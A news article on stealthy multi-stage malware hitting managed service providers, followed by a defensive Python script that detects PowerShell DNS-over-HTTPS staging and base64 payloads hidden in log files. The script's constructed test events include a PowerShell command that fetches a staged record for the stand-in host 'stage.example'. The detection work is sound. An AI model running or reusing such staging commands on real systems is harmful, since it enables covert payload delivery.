Wednesday, October 21, 03:00

Hackers spread malware to managed service providers

Hackers are spreading complex malware to managed service providers (MSPs), using multiple sophisticated stealth techniques to avoid detection, Huntress Labs said in an updated blog post.

MSPs are particularly attractive targets for hackers because they typically serve multiple clients, so one piece of malware can reach many potential victims at a time. Huntress, which provides managed detection and response (MDR) services through MSPs, first described the malware's procedures in a blog post published last June. Subsequent posts have focused on how the malware covers its tracks.


At first glance, the malware looked like an application's log file, which hid its activity, but on closer inspection the file "relates to a malicious base we discovered," Huntress co-founder John Ferrell said in the original post. "Malware writers used various tricks to hide, including renaming legitimate files, disguising themselves as existing scheduled tasks, and using a malicious payload stored in a file that was created to look like an error log."

A closer look

The malware, as John Hammond, a senior security researcher at Huntress, put it in the updated post, is a "multi-stager, multi-payload." While malware that delivers its payloads in stages is not uncommon, the lengths this malware goes to in order to avoid detection are unique. It is also sophisticated enough to go unnoticed by standard antivirus or endpoint protection software, he said.

An initial payload uses legitimate Windows binaries to extract and execute new PowerShell code, which contains another piece of hidden, encrypted data used to retrieve a second payload through Google's DNS over HTTPS service. "Using DNS over HTTPS as a means of receiving another malware payload is a very clever trick," said Hammond. To deliver the final payload, the malware code reaches out to an external server, which installs the final command-and-control component, giving the attacker control of the target system.
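Two of the behaviours described above are detectable from ordinary endpoint telemetry: PowerShell reaching a public DNS-over-HTTPS resolver to fetch its next stage, and a "log file" that is really a container for an encoded payload. The script below is an added example written for this article; it is not Huntress's code or tooling. The Sysmon-like event records, the process names and the sample log text are all constructed, and the only external facts it relies on are Google's public DoH endpoints (dns.google, 8.8.8.8 and 8.8.4.4 on port 443).

```python
"""Defender-side checks for the two staging tricks discussed in the article:
(1) PowerShell talking to a DNS-over-HTTPS resolver, (2) an error-log
look-alike carrying a large base64 blob. Event format and samples are
constructed for this example (added code, not the vendor's)."""
import base64
import binascii
import re
from dataclasses import dataclass

# Google's public DoH endpoints (real hostnames/IPs; the set is an assumption
# about which resolvers matter in a given environment).
DOH_HOSTS = {"dns.google", "8.8.8.8", "8.8.4.4"}
DOH_URL_RE = re.compile(
    r"https?://(dns\.google|8\.8\.8\.8|8\.8\.4\.4)/(dns-query|resolve)", re.I)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass(frozen=True)
class Event:
    """Minimal Sysmon-style record (constructed schema for this example)."""
    kind: str            # "process" (creation) or "network" (outbound connect)
    pid: int
    image: str           # process image name
    parent: str = ""     # parent image, informational only
    cmdline: str = ""    # full command line for process events
    dest_host: str = ""  # destination host for network events
    dest_port: int = 0


def detect_doh_staging(events):
    """Return (pid, reason) pairs for PowerShell processes that either carry a
    DoH URL on their command line or open TLS to a known DoH resolver.
    Browsers and other software legitimately use DoH, so only PowerShell
    processes are considered."""
    findings = []
    powershell_pids = set()
    for e in events:
        image = e.image.lower()
        if e.kind == "process" and image in POWERSHELL_IMAGES:
            powershell_pids.add(e.pid)
            if DOH_URL_RE.search(e.cmdline):
                findings.append((e.pid, "powershell_cmdline_doh_url"))
        elif e.kind == "network" and e.pid in powershell_pids:
            if e.dest_host.lower() in DOH_HOSTS and e.dest_port == 443:
                findings.append((e.pid, f"powershell_tls_to_doh:{e.dest_host}"))
    return findings


# A real log line rarely contains an unbroken base64 run this long.
BASE64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


def hidden_payload_in_log(text):
    """Length of the longest base64 run in `text` that decodes cleanly,
    or 0 if none. A non-zero result is a reason to inspect the file."""
    best = 0
    for m in BASE64_RUN_RE.finditer(text):
        blob = m.group(0)
        try:
            base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        best = max(best, len(blob))
    return best


# --- constructed samples -------------------------------------------------
SAMPLE_EVENTS = [
    Event("process", 4100, "powershell.exe", "cmd.exe",
          'powershell.exe -NoProfile -Command "Invoke-RestMethod '
          'https://dns.google/resolve?name=stage.example&type=TXT"'),
    Event("network", 4100, "powershell.exe", dest_host="dns.google", dest_port=443),
    Event("process", 2200, "chrome.exe", "explorer.exe", "chrome.exe"),
    Event("network", 2200, "chrome.exe", dest_host="dns.google", dest_port=443),
    Event("process", 5000, "powershell.exe", "svchost.exe",
          "powershell.exe -File C:\\scripts\\backup.ps1"),
    Event("network", 5000, "powershell.exe", dest_host="updates.example", dest_port=443),
]

CONSTRUCTED_BLOB = base64.b64encode(b"constructed-stage-two-placeholder-" * 8).decode()
SAMPLE_LOG = (
    "2020-06-01 12:00:00 INFO  Service started\n"
    "2020-06-01 12:00:01 ERROR DataHandler: " + CONSTRUCTED_BLOB + "\n"
    "2020-06-01 12:00:02 WARN  Retry scheduled\n"
)
BENIGN_LOG = "2020-06-01 12:00:00 INFO  Service started\n2020-06-01 12:00:01 ERROR disk full\n"

if __name__ == "__main__":
    for pid, reason in detect_doh_staging(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
    print("base64 run in sample log:", hidden_payload_in_log(SAMPLE_LOG))
    print("base64 run in benign log:", hidden_payload_in_log(BENIGN_LOG))
```

The browser's DoH connection (pid 2200) and the backup script (pid 5000) produce no findings, which is the point of keying on the process image rather than on the destination alone.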
